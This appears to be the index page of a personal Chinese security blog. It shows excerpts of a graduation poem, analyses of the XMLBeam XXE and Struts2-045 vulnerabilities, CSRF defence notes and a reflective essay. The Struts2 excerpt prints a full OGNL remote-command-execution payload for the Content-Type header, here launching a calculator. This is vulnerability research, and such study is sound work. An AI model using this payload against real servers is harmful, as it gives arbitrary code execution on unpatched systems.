毕业诗
毕业时有感而作,纪念一下啦~ 毕业诗— LandGrey千帆竞去白衣少,思量缄言道阻长。同窗置腹杯盏照,不坠青云月满江。
更多 →XMLBeam-XXE(CVE-2018-1259)漏洞简析
0x00: 漏洞信息 根据 CVE-2018-1259 的信息可知, Spring Data Commons 版本在 1.13—1.13.11 和 2.0—2.0.6 ,Spring Data REST 版本在 2.6-2.6.11 和 3.0-3.0.6,因为使用了小于等于 1.4.14 版本的 XMLBeam 导致存在XML实体注入漏洞。 0x01: 环境搭建 由于 XXE 漏洞实际是存在于 XMLBeam 中,所以我们写一个简单的调用 XMLBeam 的代码,用来触发漏洞,版本就选择可以触发漏洞的最新版 XMLBeam ,所以首先下载 1.4.14版本 XMLBeam 备用。 然后使用 IDEA 创建一个 名为 demo 的 Spring Boot 应用,主要是添加一个 "/login" RequestMapping URL映射路径,模拟使用XML数据认证进行登录。 主要代码文件 ...
更多 →struts2-045漏洞Debug与POC分析
0x00:环境准备 通过 Apache Struts2 Release 页面可知:受struts2-045(CVE-2017-5638)漏洞影响的最新struts版本为 Struts 2.5.10, 在官方 archive 页面下载Struts 2.5.10 showcase(app)版本,用Tomcat 7本地部署应用进行debug。 0x01:调试准备 补丁移除了 apache/struts2/interceptor/FileUploadInterceptor.java 文件中 LocalizedTextUtil.findText() 函数对错误信息的处理部分: 漏洞信息: 1.漏洞发生在 Jakarta 上传解析器 2.受影响struts版本是Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10 3.通过Content-Type这个header头,进而执行命令,通过 Strus2 对错误消息的处理进行回显 POC (Windows 弹计算器): ${(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='calc').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; 0x02:正式调试 根据上面的信息,用IDEA 在 struts2-core-2.5.10.jar!/org/apache/struts2/dispatcher/Dispatcher.class 第584行下第一个断点: 然后如下图所示,用Burpsuite在 HTTP Content-Type ...
更多 →再谈CSRF漏洞防御
漏洞简述用户认证成功后访问或点击了黑客控制的网站链接,浏览器根据黑客网页代码指示,使用用户的身份凭证(Cookie)自动请求服务器,冒充用户身份完成恶意操作。 根本原因HTTP协议是无状态的协议,所以引入了Cookie机制来辨识和跟踪用户,但Cookie最初被设计成允许在第三方网站发起的请求中携带,从而成为CSRF漏洞滋生的土壤。 利用流程测试思路下面的英文描述更清楚简洁一点 Perform the request without modifying the parameters, see what the result is Remove the CSRF token completely Modify one of the characters in the token (keep the length same) Remove the value of the token (leave the parameter in place) POST request cnvert to a GET request ...
更多 →不,怀想;是,青春
从阶梯教室出来,突然不知道该往哪里走,看到图书馆灯火通明,就不自觉的要往图书馆的方向走,然后好像别人指引似的,浏览到一本书《本性孤独》。有趣的是作者根本一点名气也没有,而我却从中看到了自己的影子。 三毛说:”心之何如,有似万丈迷津,遥亘千里,其中并无舟子可以渡人,除了自渡,他人爱莫能助。”突然回想到那些时光,那些曾经让我想逃避,让我厌恶的时光。 初中最为致命。在学校中,我脑子里面除了学习,似乎再无其它 东西。那时的自己也最为强大,强大到可以主观上屏蔽一切影响我学习书本内容的所有东西。可以忽视教室里所有的人,想象着只有自己一个人在一个独立的空间,谁都无法影响到我。仍书、吵闹、晃来晃去的手机,在我眼中就是空气一般的存在。那时冬天早上,天还没有亮,可以看见夜空的星星。我洗头就是直接用凉的自来水冲头,出宿舍门不久,头发都冻成了冰渣,一般都是等完了冰渣,再用手直接把头上的冰渣都拨掉。出去在小摊上买点东西吃,然后趴在教室的栏杆上仰望下天空不过3秒,就回到教室中,一人边吃东西,边背书。这样的结果是,现在仍然具有早上凉水冲头的技能。那时,脑子一根筋的我错过了很多美好的事情。也是那时独特的缺憾。 如此,我梦想着逃避这种生活,当然,慢慢的,我不再如此单调的生活,只因我不想再错过些那时本应该发生的美好的事情。但是,慢慢的,再也找不回那时的感觉。自己也试图找寻过原因,但最终还是欺骗自己说,人长大了,总归是要变一些的,怎么能找回以前的感觉呢? 另我惊讶的是,我今天确实找到了,一种在不知下一步往何处去时的深沉的思考引我找到一本书,然后看到了多年前寻找的问题的答案。 本来以为这世上的人只会走两条路:一条是按照条条杠杠,别人制定的规矩,跟着大众走;一条是主观的绝对的自由 ,跟着自己的心走。可是,我突然从书中指引的回忆中看到我在初中时走的另一条道路:就只是往前走,脚踏在自己的心上,心贴地面。这就是答案,原来一直跟着自己的心走,可是心在胸膛,这个大家都认为的再正常不过的位置。心呆在胸膛久了,就浮到空中了,没有原来的生气。 一直想不通为什么总想找到那段曾让我逃避的时光,那让我怀想到难受的时光。原来,那段时光给了我人生的第三条路。现在,抛却所有的理所当然和麻木,回到路上,青春洋溢。 作于 2015-10-23
更多 →